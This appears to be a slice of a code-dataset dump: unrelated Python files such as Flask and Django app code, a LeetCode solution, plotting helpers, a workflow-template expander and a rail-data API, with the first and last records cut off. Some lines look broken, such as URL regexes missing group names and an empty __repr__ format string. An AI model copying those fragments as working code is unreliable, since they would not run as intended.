value\n\n\telif name.lower == \"name\":\n\t\tif value is not None:\n\t\t\tvariables.Name = str(value).rstrip('/') \n\n\n\telse:\n\t\tinfo.err(\"Keyword <\" + name + \"> with value <\" + value + \"> from config file does not appear to be valid.\")\n\n\ndef loadConfig(configFile):\n\tif configFile is None:\n\t\tinfo.info(\"Config file path not set, skipping loading from config.\")\n\t\treturn\n\tif not check.file_exists(configFile):\n\t\tinfo.err(\"Config file does not exist!\")\n\t\n\t# now start loading some shit maybe?\n\ttry: \n\t\tfile = open(configFile, mode='r', encoding='utf-8')\n\texcept:\n\t\terr(\"Could not open config file for reading. Insufficient permissions?\")\n\n\tfor line in file:\n\t\tline=line.strip()\n\t\t# skip comments and lines with whitespaces only\n\t\tif line.startswith('#') or not line.strip():\n\t\t\tcontinue\n\t\tif \"#\" in line:\n\t\t\tline=line[0:line.find('#')]\n\t\t\tline.rstrip()\n\t\t#create array of values\t\n\t\tline = line.split(\" \", 1)\n\t\tsetVar(line[0],line[1])\n\n\tinfo.info(\"Params from config file loaded sucessfully.\")\n\treturn True\n\ndef checkVars():\n\tif variables.FPS is None and variables.Time is None:\n\t\tvariables.FPS = 25\n\tif variables.Speed is None:\n\t\tvariables.Speed = 1\n\n\n\n","sub_path":"reset.py","file_name":"reset.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327659074","text":"from flaskps import db\nfrom sqlalchemy_utils import ChoiceType\nfrom .constants import (\n GENDER_CHOICES,\n)\n\nclass Students(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n surname = db.Column(db.String(60))\n name = db.Column(db.String(60))\n birth_date = db.Column(db.Date())\n borned = db.Column(db.String(60))\n locality = db.Column(db.String(60))\n address = db.Column(db.String(60))\n gender = db.Column(ChoiceType(GENDER_CHOICES))\n document_type = db.Column(db.String(60))\n document_number = db.Column(db.String(60))\n tutor = db.Column(db.String(60))\n phone = db.Column(db.String(60))\n tutor_name = db.Column(db.String(60))\n level_id = db.Column(db.Integer, db.ForeignKey('level.id'), nullable=False)\n school_id = db.Column(db.Integer, db.ForeignKey('school.id'), nullable=False)\n neighborhood_id = db.Column(db.Integer, db.ForeignKey('neighborhood.id'), nullable=False)\n\n\n\n def __repr__(self):\n return '' % self.name\n\n @classmethod\n def create(cls, form):\n instance = cls(\n name=form.name.data,\n surname=form.surname.data,\n birth_date=form.birth_date.data,\n borned=form.borned.data,\n locality=form.locality.data,\n address=form.address.data,\n neighborhood_id=form.neighborhood.data,\n gender=form.gender.data,\n document_type=form.document_type.data,\n document_number=form.document_number.data,\n tutor=form.tutor.data,\n phone=form.phone.data,\n school_id=form.school.data,\n level_id=form.level.data,\n tutor_name=form.tutor_name.data,\n )\n db.session.add(instance)\n try:\n db.session.commit()\n except:\n db.session.rollback()\n return instance\n\n @classmethod\n def delete(cls, student_id):\n student = Students.query.filter_by(id=student_id).first_or_404()\n db.session.delete(student)\n db.session.commit()\n\n def update(self, form):\n self.name = form.name.data\n self.surname = form.surname.data\n self.birth_date = form.birth_date.data\n self.borned = form.borned.data\n self.locality = form.locality.data\n self.address = form.address.data\n self.neighborhood = form.neighborhood.data\n self.gender = form.gender.data\n self.document_type = form.document_type.data\n self.document_number = form.document_number.data\n self.tutor = form.tutor.data\n self.phone = form.phone.data\n self.school = form.school.data\n self.level = form.level.data\n\n db.session.commit()\n\n\nclass Neighborhood(db.Model):\n id = db.Column(db.Integer(), primary_key=True)\n name = db.Column(db.String(60), unique=True, nullable=False)\n\nclass Level(db.Model):\n id = db.Column(db.Integer(), primary_key=True)\n name = db.Column(db.String(60), unique=True, nullable=False)\n\nclass School(db.Model):\n id = db.Column(db.Integer(), primary_key=True)\n name = db.Column(db.String(60), unique=True, nullable=False)\n address = db.Column(db.String(100))\n phone = db.Column(db.String(20))\n","sub_path":"flaskps/app/students/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246735351","text":"class Solution:\n def romanToInt(self, s: str) -> int:\n # Start by splitting the string into symbols\n # Group subtractions together, maybe loop through once and check for them?\n # E.g. look ahead to next letter and if it is greater then group\n # Sum up the resulting symbols\n\n symbols = [letter for letter in s]\n\n subtraction = False # Keep track of whether current loop is subtraction\n\n numeral_to_int = 0\n\n for idx, letter in enumerate(symbols):\n\n # Skip this loop if the previous loop was subtraction\n if subtraction:\n subtraction = False # Reset subtraction so we continue with the loop\n continue\n\n # first check to make sure we are not at the end of the list\n if (idx + 1) < len(symbols):\n next_letter = symbols[idx+1]\n\n # Check for all subtractions\n\n # check for CD and CM subtraction\n if letter == \"C\" and next_letter == \"D\":\n numeral_to_int += 400\n subtraction = True\n continue\n if letter == \"C\" and next_letter == \"M\":\n numeral_to_int += 900\n subtraction = True\n continue\n\n # Check for XL and XC subtraction\n if letter == \"X\" and next_letter == \"L\":\n numeral_to_int += 40\n subtraction = True\n continue\n if letter == \"X\" and next_letter == \"C\":\n numeral_to_int += 90\n subtraction = True\n continue\n\n # Check for IV and IX subtraction\n if letter == \"I\" and next_letter == \"V\":\n numeral_to_int += 4\n subtraction = True\n continue\n if letter == \"I\" and next_letter == \"X\":\n numeral_to_int += 9\n subtraction = True\n continue\n\n # If no subtractions, add the correct numeral value\n # Unindented bc this can be the last element of the list\n numeral_values = {\n \"I\": 1,\n \"V\": 5,\n \"X\": 10,\n \"L\": 50,\n \"C\": 100,\n \"D\": 500,\n \"M\": 1000\n }\n\n numeral_to_int += numeral_values[letter]\n\n return numeral_to_int\n\n","sub_path":"leetcode/romanToInt.py","file_name":"romanToInt.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"496733968","text":"import pygame\r\n\r\nclass Node:\r\n 'single grid node class'\r\n\r\n def __init__(self):\r\n self.id = 0\r\n self.color = 0 # 0 - white\r\n self.neighbours = []\r\n self.rect = pygame.Rect(0,0,50,50)\r\n self.handled = False\r\n self.isWall = False\r\n self.x = 0\r\n self.y = 0\r\n self.parent = None\r\n self.inOpenSet = False\r\n self.g = 0\r\n self.h = 0\r\n self.f = 0\r\n\r\n def __eq__(self, other):\r\n if self.id == other.id:\r\n return True\r\n else:\r\n return False\r\n \r\n def __lt__(self,other):\r\n return self.f < other.f\r\n\r\n\r\n def draw(self, window, x, y, sprites):\r\n if self.color == 0:\r\n window.blit(sprites[0], (x, y))\r\n elif self.color == 1:\r\n window.blit(sprites[1], (x, y))\r\n elif self.color == 2:\r\n window.blit(sprites[2], (x, y))\r\n elif self.color == 3:\r\n window.blit(sprites[3], (x, y))\r\n elif self.color == 4:\r\n window.blit(sprites[4], (x, y))\r\n\r\n def getColor(self):\r\n return self.color","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23741420","text":"from django.conf.urls import url\nfrom trash import views\n\nurlpatterns = [\n url(r'^$', views.trash_list, name='trash_index'),\n url(r'^add$', views.trash_add, name='trash_add'),\n url(r'^list$', views.trash_list, name='trash_list'),\n url(r'^detail/(?P\\d+)$', views.trash_details, name='trash_details'),\n url(r'^delete/(?P\\d+)$', views.trash_delete, name='trash_delete'),\n url(r'^(?P\\d+)/recovery', views.recovery_file, name='recovery_file'),\n]","sub_path":"trash/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477880577","text":"from sys import argv as argument\ntry:\n argument[1]\nexcept IndexError:\n exit()\n\nimport sqlite3\n\n\nconnection = sqlite3.connect('users.db')\nc = connection.cursor()\n\nif argument[1] == \"insert\":\n user_name = input(\"Name: \")\n user_age = input(\"Age: \")\n c.execute(\"INSERT INTO users VALUES (?, ?)\", (user_name, user_age))\n\nelif argument[1] == \"show\":\n username = input(\"User-Name: \")\n c.execute(\"SELECT * FROM users WHERE name=?\", (username,))\n print(c.fetchone())\n\nconnection.commit()\nconnection.close()\n","sub_path":"Database/sqlite/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382824071","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n# plt.style.use('simple') # --- makes nicer plots\n\n\n\n\ndef make_significance_plot(img, threshold = 2.5, show = False, filename = False, imsize = 1):\n\n fig = plt.figure(figsize=(imsize, imsize))\n ax = fig.add_axes([0,0,1,1])\n\n ax.axis('off')\n\n sig = (img.sci/img.noise)\n\n ax.imshow(sig, cmap = cm.Greys, vmin = -5.0, vmax = 5.0, origin = 'lower')\n ax.imshow(np.ma.masked_where(sig <= threshold, sig), cmap = cm.plasma, vmin = threshold, vmax = 100, origin = 'lower')\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\n\ndef make_significance_plots(imgs, threshold = 2.5):\n\n n = len(imgs)\n\n fig, axes = plt.subplots(1, n, figsize = (4*n,4))\n plt.subplots_adjust(left=0, top=1, bottom=0, right=1, wspace=0.01, hspace=0.0)\n\n for ax, (filter, img) in zip(axes, imgs.items()):\n\n sig = (img.sci/img.noise)\n\n ax.set_axis_off()\n ax.imshow(sig, cmap = cm.Greys, vmin = -5.0, vmax = 5.0, origin = 'lower')\n ax.imshow(np.ma.masked_where(sig <= threshold, sig), cmap = cm.plasma, vmin = threshold, vmax = 100, origin = 'lower')\n\n plt.show()\n plt.close(fig)\n\n\n\n\ndef make_segm_plot(segm, imsize = 1, filename = False, show = False):\n\n fig, ax = plt.subplots(1, 1, figsize = (imsize,imsize))\n\n plt.subplots_adjust(left=0, top=1, bottom=0, right=1, wspace=0.0, hspace=0.0)\n\n new_cmap = rand_cmap(int(np.max(segm)), type='bright', first_color_black=True, last_color_black=False, verbose=False)\n\n ax.imshow(segm, cmap = new_cmap, origin = 'lower')\n\n ax.set_axis_off()\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\ndef make_plots(imgs, threshold = 2.5, signficance_plot = False, filter_label = False, filename = False, show = False, use_vmax = True, fixed_range = False, imsize = 1, frame = True):\n\n n = len(imgs)\n\n if show:\n imsize = 4\n else:\n imsize = imsize\n\n if hasattr(next(iter(imgs.values())), 'sci'):\n fig, axes = plt.subplots(1, n, figsize = (n*imsize,1*imsize), dpi = next(iter(imgs.values())).sci.shape[0])\n else:\n fig, axes = plt.subplots(1, n, figsize = (n*imsize,1*imsize))\n\n plt.subplots_adjust(left=0, top=1, bottom=0, right=1, wspace=0.0, hspace=0.0)\n\n if type(signficance_plot) != list: signficance_plot = [signficance_plot]*n\n\n if hasattr(next(iter(imgs.values())), 'sci'):\n if fixed_range:\n vmax = np.max([np.max(img.sci) for img in imgs.values()])\n else:\n if fixed_range:\n vmax = np.max([np.max(img) for img in imgs.values()])\n\n\n for ax, (filter, img), sig_plot in zip(axes, imgs.items(), signficance_plot):\n\n if frame:\n ax.get_xaxis().set_ticks([])\n ax.get_yaxis().set_ticks([])\n else:\n ax.set_axis_off()\n\n if filter_label: ax.text(0.5, 0.9, filter, horizontalalignment='center', verticalalignment='center', transform=ax.transAxes, fontsize = 8, color = '1.0')\n\n if sig_plot:\n\n sig = (img.sci/img.noise)\n\n ax.imshow(sig, cmap = cm.Greys, vmin = -5.0, vmax = 5.0, origin = 'lower')\n ax.imshow(np.ma.masked_where(sig <= threshold, sig), cmap = cm.plasma, vmin = threshold, vmax = 100, origin = 'lower')\n\n else:\n\n new_cmap = rand_cmap(np.max(img), type='bright', first_color_black=True, last_color_black=False, verbose=False)\n\n if fixed_range:\n vmin = 0.0\n else:\n vmin = None\n vmax = None\n\n if hasattr(img, 'sci'):\n ax.imshow(img.sci, cmap = cm.viridis, origin = 'lower', vmin = vmin, vmax = vmax)\n else:\n ax.imshow(img, cmap = new_cmap, origin = 'lower', vmin = vmin, vmax = vmax) # --- assumes img is just a 2D array\n\n\n\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\ndef rand_cmap(nlabels, type='bright', first_color_black=True, last_color_black=False, verbose=True):\n \"\"\"\n Creates a random colormap to be used together with matplotlib. Useful for segmentation tasks\n :param nlabels: Number of labels (size of colormap)\n :param type: 'bright' for strong colors, 'soft' for pastel colors\n :param first_color_black: Option to use first color as black, True or False\n :param last_color_black: Option to use last color as black, True or False\n :param verbose: Prints the number of labels and shows the colormap. True or False\n :return: colormap for matplotlib\n \"\"\"\n from matplotlib.colors import LinearSegmentedColormap\n import colorsys\n\n\n\n if type not in ('bright', 'soft'):\n print ('Please choose \"bright\" or \"soft\" for type')\n return\n\n if verbose:\n print('Number of labels: ' + str(nlabels))\n\n # Generate color map for bright colors, based on hsv\n if type == 'bright':\n randHSVcolors = [(np.random.uniform(low=0.0, high=1),\n np.random.uniform(low=0.2, high=1),\n np.random.uniform(low=0.9, high=1)) for i in range(nlabels)]\n\n # Convert HSV list to RGB\n randRGBcolors = []\n for HSVcolor in randHSVcolors:\n randRGBcolors.append(colorsys.hsv_to_rgb(HSVcolor[0], HSVcolor[1], HSVcolor[2]))\n\n if first_color_black:\n randRGBcolors[0] = [0, 0, 0]\n\n if last_color_black:\n randRGBcolors[-1] = [0, 0, 0]\n\n random_colormap = LinearSegmentedColormap.from_list('new_map', randRGBcolors, N=nlabels)\n\n # Generate soft pastel colors, by limiting the RGB spectrum\n if type == 'soft':\n low = 0.6\n high = 0.95\n randRGBcolors = [(np.random.uniform(low=low, high=high),\n np.random.uniform(low=low, high=high),\n np.random.uniform(low=low, high=high)) for i in range(nlabels)]\n\n if first_color_black:\n randRGBcolors[0] = [0, 0, 0]\n\n if last_color_black:\n randRGBcolors[-1] = [0, 0, 0]\n random_colormap = LinearSegmentedColormap.from_list('new_map', randRGBcolors, N=nlabels)\n\n # Display colorbar\n if verbose:\n from matplotlib import colors, colorbar\n from matplotlib import pyplot as plt\n fig, ax = plt.subplots(1, 1, figsize=(15, 0.5))\n\n bounds = np.linspace(0, nlabels, nlabels + 1)\n norm = colors.BoundaryNorm(bounds, nlabels)\n\n cb = colorbar.ColorbarBase(ax, cmap=random_colormap, norm=norm, spacing='proportional', ticks=None,\n boundaries=bounds, format='%1i', orientation=u'horizontal')\n\n return random_colormap\n\n\ndef COG_plots(Properties, ModelProperties = False, filename = False, show = False):\n\n nfilters = len(Properties)\n\n fig, axes = plt.subplots(1, nfilters, figsize = (3*(nfilters),3), dpi = 200)\n\n plt.subplots_adjust(left=0.025, top=0.85, bottom=0.2, right=0.9, wspace=0.2, hspace=0.0)\n\n for ax, (filter, properties) in zip(axes, Properties.items()):\n\n ax.set_title(filter, fontsize = 10)\n\n ax.plot(properties['photometry']['aperture'].radii, properties['photometry']['aperture'].flux, c = '0.5', label = 'curve-of-growth')\n ax.axvline(properties['photometry']['aperture'].optimum_radius, color = '0.5', alpha = 0.5)\n\n if ModelProperties is not False:\n\n ax.axhline(ModelProperties[filter]['photometry']['total'].flux, color = '0.5', alpha = 0.5, ls = ':')\n ax.plot(ModelProperties[filter]['photometry']['aperture'].radii, ModelProperties[filter]['photometry']['aperture'].flux, c = '0.5', ls = ':', label = 'true curve-of-growth')\n\n\n\n del properties['photometry']['aperture']\n\n color_idx = np.linspace(0, 1, len(properties['photometry']))\n\n for c_idx, (phot_type, p) in zip(color_idx, properties['photometry'].items()):\n\n ax.axhline(p.flux, label = phot_type, color = cm.viridis(c_idx))\n ax.axhspan(p.flux-p.error, p.flux+p.error, color = cm.viridis(c_idx), alpha=0.5)\n if phot_type == 'optimum_aperture': ax.axvline(p.radius, color = cm.viridis(c_idx), alpha = 0.5)\n\n ax.legend(bbox_to_anchor=(1.1, 1.0), fontsize = 8)\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\ndef SED_plot(Properties, ModelProperties = False, FilterInfo = False, phot_type = 'optimum_aperture', filename = False, show = False):\n\n\n # if not FilterInfo:\n\n fig, ax = plt.subplots(1, 1, figsize = (3,2), dpi = 200)\n plt.subplots_adjust(left=0.2, top=0.85, bottom=0.25, right=0.9, wspace=0.2, hspace=0.0)\n\n color_idx = np.linspace(0, 1, len(Properties))\n\n for c_idx, (filter, properties) in zip(color_idx, Properties.items()):\n\n pivwv = FilterInfo[filter].pivwv()/1E4\n\n ax.scatter(pivwv, properties['photometry'][phot_type].flux, color = cm.viridis(c_idx))\n ax.plot([pivwv]*2, [properties['photometry'][phot_type].flux - properties['photometry'][phot_type].error, properties['photometry'][phot_type].flux + properties['photometry'][phot_type].error], color = 'k', lw = 1)\n\n if ModelProperties is not False:\n\n ax.scatter(pivwv, ModelProperties[filter]['photometry']['total'].flux, color = cm.viridis(c_idx), alpha = 0.5)\n\n\n\n ax.set_xlabel(r'$\\lambda/\\mu m$')\n ax.set_ylabel(r'$f_{\\nu}/nJy$')\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\n\ndef size_plot(img, p, ExclusionMask, threshold = 2.5, signficance_plot = False, filename = False, show = False, add_contours = False):\n\n\n width = img.sci.shape[0]\n\n fig, ax = plt.subplots(1, 1, figsize = (3,3), dpi = width*2)\n plt.subplots_adjust(left=0, top=1, bottom=0, right=1, wspace=0.01, hspace=0.0)\n\n ax.set_axis_off()\n\n sig = (img.sci/img.noise)\n\n ax.imshow(sig, cmap = cm.Greys, vmin = -5.0, vmax = 5.0, origin = 'lower')\n ax.imshow(np.ma.masked_where(sig <= threshold, sig), cmap = cm.plasma, vmin = threshold, vmax = 100, origin = 'lower')\n\n k = 2.5\n\n # --- make mask image including Kron Mask and Exclusion mask\n x = np.linspace(-(width//2), (width//2), width)\n X, Y = np.meshgrid(x, x)\n R2 = X**2 + Y**2\n alpha = np.zeros(img.sci.shape)\n alpha[R2>(k*p['kron_radius'])**2] = 1\n alpha[img.sci 0 and \\\n request.args.get('start_date') != \"undefined\":\n start_date_string = request.args.get('start_date')\n if 'end_date' in request.args and \\\n len(request.args.get('end_date')) > 0 and \\\n request.args.get('end_date') != \"undefined\":\n end_date_string = request.args.get('end_date')\n\n return end_date_string, start_date_string\n\n\ndef parse_dates_from_request():\n end_date_string, start_date_string = parse_dates_as_str_from_request()\n # noinspection PyBroadException\n try:\n start_date = datetime.datetime.strptime(start_date_string, '%Y-%m-%d')\n end_date = datetime.datetime.strptime(end_date_string, '%Y-%m-%d')\n except Exception:\n abort(400, 'Start and end dates must be valid. Dates must be in the form of YYYY-MM-DD.')\n return\n\n return end_date, start_date\n\n\nbp = Blueprint('system', __name__, url_prefix='/system')\napi_groups = ['admins']\n\n\n@route(bp, '/error_email_test')\n@login_required\n@groups_required(api_groups, all=False)\ndef error_email_test():\n errors.email_exception(app, Exception(\"test\"))\n return {'status':'ok'}\n","sub_path":"taa/api/api_helpers.py","file_name":"api_helpers.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158961448","text":"import time\r\n\r\n\r\ndef test_button_add_to_busket(browser):\r\n link = f\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\r\n browser.get(link)\r\n \r\n button = browser.find_element_by_css_selector(\"#add_to_basket_form > button\")\r\n #button.klick()\r\n time.sleep(10)\r\n \r\ndef test_button_text(browser):\r\n\r\n link = f\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\r\n browser.get(link)\r\n try:\r\n button = browser.find_element_by_xpath(\"//button[text()='Add to basket']\")\r\n \r\n \r\n except:\r\n button = browser.find_element_by_css_selector(\"#add_to_basket_form > button\")\r\n \r\n if True:\r\n assert button == True, \"Кнопка есть, проверьте название на английском\"\r\n \r\n\r\n ","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373355999","text":"from django.shortcuts import render, redirect\nfrom django.http import Http404\nfrom .funcs import Books\nfrom .forms import SearchBarFilters\n\n# class init\nbooks = Books()\n\ndef index(request):\n context = {\n \"title\": \"LibraLive: Каталог\",\n \"popular_books\": books.get_6_most_popular(),\n \"latest_books\": books.get_6_latest(),\n \"filters\": SearchBarFilters\n }\n if request.method == \"POST\":\n form = SearchBarFilters(request.POST)\n if form.is_valid():\n return redirect(search)\n return render(request, \"library/index.html\", context)\n\ndef search(request):\n requested_books = books.apply_filters(request.POST)\n context = {\n \"title\": \"LibraLive: Результаты поиска\",\n \"requested_books\": requested_books,\n \"filters\": SearchBarFilters\n }\n return render(request, \"library/search.html\", context)\n\ndef book(request, book_id):\n requested_book = books.get_by_id(book_id)\n if not requested_book:\n raise Http404()\n context = {\n \"title\": f\"LibraLive: Книга: {requested_book.title}\",\n \"book\": requested_book,\n }\n return render(request, \"library/book.html\", context)\n\ndef download(request, book_id):\n if request.method == \"POST\" and book_id:\n books.registrate_download(book_id)\n raise Http404()\n\ndef about(request):\n return render(request, \"library/about.html\", {\"title\": \"LibraLive: О нас\"})\n\ndef not_found(request, exception):\n return render(request, \"library/404.html\", {\"title\": \"LibraLive: Не найдено\"})\n","sub_path":"LibraLive/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"352762470","text":"\nfrom .MagEnv import MagEnv\nfrom .AtmophericModel.EarthModel import EarthModel\n\n\nclass Environment(MagEnv, EarthModel):\n def __init__(self, environment_properties):\n MagEnv.__init__(self, environment_properties['MAG'])\n EarthModel.__init__(self)\n\n self.env_mag_flag = environment_properties['MAG']['mag_calculation']\n self.env_srp_flag = environment_properties['SRP']['srp_calculation']\n self.env_atm_flag = environment_properties['ATM']['atm_calculation']\n\n print('\\nEnvironment properties')\n print('------------------------------')\n print('Magnetic: ' + str(self.env_mag_flag))\n print('Solar radiation: ' + str(self.env_srp_flag))\n print('Atmosphere: ' + str(self.env_atm_flag))\n print('------------------------------')\n\n def update(self, decyear, dynamics):\n sideral = dynamics.ephemeris.selected_planet.current_sideral\n lat = dynamics.trajectory.current_lat\n lon = dynamics.trajectory.current_long\n alt = dynamics.trajectory.current_alt\n q_i2b = dynamics.attitude.current_quaternion_i2b\n if self.env_mag_flag:\n self.calc_mag(decyear, sideral, lat, lon, alt, q_i2b)\n if self.env_atm_flag:\n self.calc_atmospferic_data(alt)\n\n\n\n\n","sub_path":"Environments/Environment.py","file_name":"Environment.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429186519","text":"# This file is part of the Reproducible and Reusable Data Analysis Workflow\n# Server (flowServ).\n#\n# Copyright (C) 2019-2020 NYU.\n#\n# flowServ is free software; you can redistribute it and/or modify it under the\n# terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Helper class to execute workflow templates that follow the syntax of the\nREANA serial workflow specifications.\n\"\"\"\n\nimport os\n\nfrom string import Template\n\nimport flowserv.error as err\nimport flowserv.model.template.parameter as tp\n\n\nclass Step(object):\n \"\"\"List of command line statements that are executed in a given\n environment. The environment can, for example, specify a Docker image.\n \"\"\"\n def __init__(self, env, commands=None):\n \"\"\"Initialize the object properties.\n\n Parameters\n ----------\n env: string\n Execution environment name\n commands: list(string), optional\n List of command line statements\n \"\"\"\n self.env = env\n self.commands = commands if commands is not None else list()\n\n def add(self, cmd):\n \"\"\"Append a given command line statement to the list of commands in the\n workflow step.\n\n Parameters\n ----------\n cmd: string\n Command line statement\n\n Returns\n -------\n flowserv.model.template.step.Step\n \"\"\"\n self.commands.append(cmd)\n return self\n\n\nclass SerialWorkflow(object):\n \"\"\"Wrapper around a workflow template for serial workflow specifications\n that are following the basic structure of REANA serial workflows.\n\n The methods to get the list of commands, output files and upload files are\n modeled as properties to avoid confusion with the same properties for the\n remote workflow handle.\n \"\"\"\n def __init__(self, template, arguments):\n \"\"\"Initialize the object properties.\n\n Parameters\n ----------\n template: flowserv.model.template.base.WorkflowTemplate\n Workflow template containing the parameterized specification and\n the parameter declarations\n arguments: dict\n Dictionary of argument values for parameters in the template. Maps\n the parameter identifier to the provided argument value.\n \"\"\"\n self.template = template\n self.arguments = arguments\n\n def commands(self):\n \"\"\"Get expanded commands from template workflow specification. The\n commands within each step of the serial workflow specification are\n expanded for the given set of arguments and appended to the result\n list of commands.\n\n Returns\n -------\n list(flowserv.model.template.step.Step)\n\n Raises\n ------\n flowserv.error.InvalidTemplateError\n flowserv.error.MissingArgumentError\n \"\"\"\n workflow_spec = self.template.workflow_spec\n # Get the input/parameters dictionary from the workflow specification\n # and replace all references to template parameters with the given\n # arguments or default values.\n workflow_parameters = tp.replace_args(\n spec=workflow_spec.get('inputs', {}).get('parameters', {}),\n arguments=self.arguments,\n parameters=self.template.parameters\n )\n # Add any workflow argument that is not contained in the modified\n # parameter list as a workflow parameter that is available for\n # replacement.\n for key in self.arguments:\n if key not in workflow_parameters:\n workflow_parameters[key] = str(self.arguments[key])\n # Add all command stings in workflow steps to result after replacing\n # references to parameters\n result = list()\n spec = workflow_spec.get('workflow', {}).get('specification', {})\n for step in spec.get('steps', []):\n env = step.get('environment')\n if tp.is_parameter(env):\n env = workflow_parameters[tp.NAME(env)]\n script = Step(env=env)\n for cmd in step.get('commands', []):\n if tp.is_parameter(cmd):\n cmd = workflow_parameters[tp.NAME(cmd)]\n script.add(Template(cmd).substitute(workflow_parameters))\n result.append(script)\n return result\n\n def output_files(self):\n \"\"\"Replace references to template parameters in the list of output\n files in the workflow specification.\n\n Returns\n -------\n list(string)\n\n Raises\n ------\n flowserv.error.InvalidTemplateError\n flowserv.error.MissingArgumentError\n \"\"\"\n workflow_spec = self.template.workflow_spec\n return tp.replace_args(\n spec=workflow_spec.get('outputs', {}).get('files', {}),\n arguments=self.arguments,\n parameters=self.template.parameters\n )\n\n def upload_files(self):\n \"\"\"Get a list of all input files from the workflow specification that\n need to be uploaded for a new workflow run.\n\n Returns a list of tuples containing the full path to the source file on\n local disk and the relative target path for the uploaded file.\n\n Raises errors if a parameter value is missing or if an unknown source\n file is referenced.\n\n Returns\n -------\n list((string, string))\n\n Raises\n ------\n flowserv.error.MissingArgumentError\n flowserv.error.UnknownFileError\n \"\"\"\n workflow_spec = self.template.workflow_spec\n basedir = self.template.sourcedir\n files = workflow_spec.get('inputs', {}).get('files', [])\n result = list()\n for val in files:\n # Set source and target values depending on whether the list\n # entry references a template parameter or not.\n if tp.is_parameter(val):\n # If the value in the files listing is a parameter it is\n # assumed that this is a file parameter. If no argument value\n # is given for the parameter a default value will be used as\n # source and target path.\n var = tp.NAME(val)\n para = self.template.parameters.get(var)\n arg = self.arguments.get(var)\n if arg is None:\n if para.default_value is None:\n raise err.MissingArgumentError(var)\n source = os.path.join(basedir, para.default_value)\n target = para.default_value\n else:\n # Get path to source file and the target path from the\n # input file handle.\n source = arg.source()\n target = arg.target()\n else:\n source = os.path.join(basedir, val)\n target = val\n # Add upload file source and target path to the result list.\n result.append((source, target))\n return result\n","sub_path":"flowserv/model/workflow/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263361931","text":"from flask import request,json,Response,Blueprint\nfrom ..model.rail_model import RailModel,RailSchema\nfrom ..utils.data_reader import DataReader\nfrom ..utils.shared_response import SharedResponse\nimport traceback\nimport logging\n\nlogger=logging.getLogger(__name__+\".rail_controller\")\ndata_reader=DataReader()\nrail_schema=RailSchema()\nclass RailController:\n\n def refresh():\n try:\n data_reader=DataReader()\n return SharedResponse.success_response({\"message\":\"Data refreshed Successfully\"})\n except Exception as err:\n logger.error(err)\n traceback.print_exc()\n return SharedResponse.server_error_response()\n\n def get_all():\n\n try:\n rail_data_frame=data_reader.get_all()\n rail_list=[]\n size=rail_data_frame.shape[0]\n\n for i in range(0,size):\n rail_model=RailModel(rail_data_frame.iloc[i])\n rail_list.append(rail_model)\n \n serialize_rail_model=rail_schema.dump(rail_list,many=True)\n \n\n return SharedResponse.success_response(serialize_rail_model)\n \n except Exception as err:\n logger.error(err)\n traceback.print_exc()\n return SharedResponse.server_error_response()\n \n\n \n def get_all_by_station_name_pattern(station_name):\n\n try:\n if station_name is None :\n return SharedResponse.validation_error_response()\n rail_data_frame=data_reader.get_all_by_station_name_pattern(station_name)\n rail_list=[]\n size=rail_data_frame.shape[0]\n for i in range(0,size):\n rail_model=RailModel(rail_data_frame.iloc[i])\n rail_list.append(rail_model)\n \n serialize_rail_model=rail_schema.dump(rail_list,many=True)\n \n\n return SharedResponse.success_response(serialize_rail_model)\n\n except Exception as err:\n logger.error(err)\n traceback.print_exc()\n return SharedResponse.server_error_response()\n\n def get_distance(from_station_code,to_station_code):\n\n try:\n \n if from_station_code is None or to_station_code is None:\n return SharedResponse.validation_error_response()\n\n from_rail_data_frame=data_reader.get_by_station_code(from_station_code)\n to_rail_data_frame=data_reader.get_by_station_code(to_station_code)\n\n from_rail_data_frame_size=from_rail_data_frame.shape[0]\n to_rail_data_frame_size=to_rail_data_frame.shape[0]\n\n if from_rail_data_frame_size==0 or to_rail_data_frame_size==0 :\n return SharedResponse.id_not_found_error_response()\n \n response_message_list=[]\n for i in range(from_rail_data_frame_size):\n for j in range(to_rail_data_frame_size):\n if 